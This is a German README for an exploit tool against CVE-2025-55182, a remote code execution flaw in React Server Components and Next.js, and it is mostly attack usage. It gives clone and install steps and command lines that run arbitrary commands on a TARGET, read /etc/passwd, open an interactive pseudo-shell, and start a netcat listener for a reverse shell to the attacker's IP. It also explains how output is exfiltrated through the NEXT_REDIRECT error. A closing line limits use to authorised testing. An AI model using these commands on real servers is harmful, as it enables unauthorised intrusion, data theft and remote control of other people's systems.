
CVE-2025-55182 React2Shell PoC – Kritische RCE in React Server Components / Next.js. CVSS 10.0. Fehlerbasierte Exfiltration, Reverse Shell, interaktiver Modus.
Proof of Concept für CVE-2025-55182, eine kritische nicht authentifizierte Remote-Code-Ausführungsschwachstelle in React Server Components.
CVSS-Score: 10.0 (Kritisch)
Die Schwachstelle existiert im Flight-Protokoll-Deserialisierer von React. Durch Ausnutzung von Prototype-Pollution mittels speziell gestalteter Payloads kann ein Angreifer eine beliebige Codeausführung auf verwundbaren Next.js-Anwendungen erreichen.
| Produkt | Verwundbar | Gepatched |
|---|
| React | 19.0.0 - 19.2.0 | 19.0.1, 19.1.2, 19.2.1+ |
| Next.js | 14.3.0-canary.77 - 16.x | 15.0.5, 15.1.9, 15.2.6, 16.0.7+ |
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests
Die Ausgabe wird direkt in der HTTP-Antwort über den NEXT_REDIRECT-Fehler zurückgegeben – kein Callback-Server erforderlich.
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"
python3 react2shell-poc.py -t http://TARGET:3000 -i
python3 react2shell-poc.py -t http://TARGET:3000 --check
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind
# Listener starten
nc -lvnp 4444
# Payload senden
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP
-t, --target Ziel-URL (erforderlich)
-c, --command Auszuführender Befehl (Ausgabe standardmäßig über fehlerbasierte Exfiltration)
--check Prüfen, ob das Ziel verwundbar ist
--blind Blind-RCE-Modus (keine Ausgabeerfassung)
--listen Callback-Server anstelle der fehlerbasierten Exfiltration verwenden
-i, --interactive Interaktiver Pseudo-Shell-Modus
--revshell Reverse Shell versuchen
--lhost Angreifer-IP für Callbacks/Reverse Shell
--lport Callback-Port (Standard: 9999)
--callback Manuelle Callback-URL
--timeout Request-Timeout in Sekunden (Standard: 30)
Die standardmäßige Exfiltrationsmethode verwendet die NEXT_REDIRECT-Fehlerinjektion:
NEXT_REDIRECT-Fehler mit der Ausgabe im digest-Feld auslösenDies ist zuverlässiger als die callback-basierte Exfiltration, da hierfür kein ausgehender Netzwerkzugriff vom Ziel aus erforderlich ist.
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen stets eine ordnungsgemäße Autorisierung ein.
p3ta